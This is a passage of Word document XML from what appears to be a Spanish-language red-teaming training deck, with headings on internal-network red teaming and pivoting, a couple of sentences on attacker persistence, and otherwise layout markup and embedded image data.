      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Por supuesto, la persistencia de la tierra del kernel es algo que es muy difícil de detectar y generalmente requiere un análisis profundo de la persistencia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7359D65A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="323"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5881271E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1192"/>
        </w:tabs>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:ind w:left="1192" w:right="1807" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los piratas informáticos pueden engañar a la víctima persistiendo en el espacio terrestre del usuario, pronto veremos varias formas de lograr la persistencia en la máquina de la víctima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC67D71" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="292" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C74631" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61DCC69A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="678"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DBBE513" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="8"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>PIVOTANTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4FEFA7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="292" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A9CD49" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A352768" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1435C256" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D6D1E5A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E325CFB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="132"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D25CD72" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="2733"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E1ECE3F" wp14:editId="5EDB225F">
                <wp:extent cx="8961120" cy="3214370"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>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1120" cy="3214370"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="B34512"/>
                        </a:solidFill>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="745DCAFB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="1011" w:line="211" w:lineRule="auto"/>
                              <w:ind w:left="1997" w:firstLine="844"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="120"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:color w:val="FFFFFF"/>
                                <w:sz w:val="120"/>
                              </w:rPr>
                              <w:t>4. Red Teaming en el entorno interno</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="5E1ECE3F" id="Textbox 449" o:spid="_x0000_s1227" type="#_x0000_t202" style="width:705.6pt;height:2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" fillcolor="#b34512" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="745DCAFB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="1011" w:line="211" w:lineRule="auto"/>
                        <w:ind w:left="1997" w:firstLine="844"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="120"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:color w:val="FFFFFF"/>
                          <w:sz w:val="120"/>
                        </w:rPr>
                        <w:t>4. Red Teaming en el entorno interno</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E475418" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="292" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41721A13" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="983" w:lineRule="exact"/>
        <w:ind w:left="3299"/>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402112" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17C28E66" wp14:editId="1DDDAA83">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="6858000"/>
                <wp:effectExtent l="0" t="0" r="0" b="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8000"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="451" name="Graphic 451"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1304925"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="12192000" h="1304925">
                                <a:moveTo>
                                  <a:pt x="0" y="1304544"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="1304544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1304544"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="B34512"/>
                          </a:solidFill>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206" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="2781300" y="1245129"/>
                            <a:ext cx="6615683" cy="5612870"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="453" name="Image 453"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId207" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="2973323" y="1437132"/>
                            <a:ext cx="6245352" cy="5285232"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="78FBAE37" id="Group 450" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:540pt;z-index:-17914368;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="121920,68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O/G//Idf/rmtYFb/AI3/&#10;AOQ6/wD1zWsCvNn8TPr8N/Bh6BRRRUHSFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU&#10;UUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABXr&#10;ll/x5wf9c1/lXkdeuWX/AB5wf9c1/lXVQ3Z4uZ/DD5k9FFFdZ4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N/wDkOv8A9c1rArf8b/8AIdf/AK5rWBXmz+Jn&#10;1+G/gw9AoooqDpCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK&#10;KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAr1yy/wCPOD/rmv8AKvI6&#10;9csv+POD/rmv8q6qG7PFzP4YfMnooorr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vxv/wAh1/8ArmtYFb/jf/kOv/1zWsCvNn8TPr8N/Bh6BRRRUHSFFFFABRRRQAUUUUAF&#10;FFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUU&#10;UUAFFFFABRRRQAUUUUAFFFFABXrll/x5wf8AXNf5V5HXrll/x5wf9c1/lXVQ3Z4uZ/DD5k9FFFdZ&#10;4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d+N/+Q6//XNawK3/ABv/AMh1&#10;/wDrmtYFebP4mfX4b+DD0CiiioOkKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA&#10;KKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACvXLL/j&#10;zg/65r/KvI69csv+POD/AK5r/Kuqhuzxcz+GHzJ6KKK6zw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78b/wDIdf8A65rWBW/43/5Dr/8AXNawK82fxM+vw38GHoFFFFQdIUUU&#10;UAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQ&#10;AUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFeuWX/AB5wf9c1/lXkdeuWX/HnB/1zX+VdVDdn&#10;i5n8MPmT0UUV1ng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O/&#10;G/8AyHX/AOua1gVv+N/+Q6//AFzWsCvNn8TPr8N/Bh6BRRRUHSFFFFABRRRQAUUUUAFFFFABRRRQ&#10;AUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFAB&#10;RRRQAUUUUAFFFFABXrll/wAecH/XNf5V5HXrll/x5wf9c1/lXVQ3Z4uZ/DD5k9FFFdZ4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d+N/+Q6//AFzWsCt/xv8A8h1/+ua1gV5s&#10;/iZ9fhv4MPQKKKKg6QooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKA&#10;CiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAK9csv+POD/rmv8q8j&#10;r1yy/wCPOD/rmv8AKuqhuzxcz+GHzJ6KKK6zw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zvxv/AMh1/wDrmtYF&#10;b/jf/kOv/wBc1rArzZ/Ez6/DfwYegUUUVB0hRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUU&#10;UAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQ&#10;AV65Zf8AHnB/1zX+VeR165Zf8ecH/XNf5V1UN2eLmfww+ZPRRRXWeC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&#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">
                <v:shape id="Graphic 451" o:spid="_x0000_s1027" style="position:absolute;width:121920;height:13049;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219200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" path="m,1304544r12192000,l12192000,,,,,1304544xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Image 452" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:27813;top:12451;width:66156;height:5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">
                  <v:imagedata r:id="rId208" o:title=""/>
                </v:shape>
                <v:shape id="Image 453" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:29733;top:14371;width:62453;height:5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">
                  <v:imagedata r:id="rId209" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>4.1 Visión general de la infraestructura interna</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515F2065" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496AA632" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B76AE66" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="330D378D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D18F46A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61655854" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07FA75D8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E87A574" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24E31FA5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3841C1E0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB78C69" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1592706A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DEF44F0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F346807" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2887C144" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B0E16AE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66890E44" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32F526B0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D9FB91" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2294A40C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6626F2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F0E070" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BDF1051" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2781AEEC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35204FC1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A0658C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
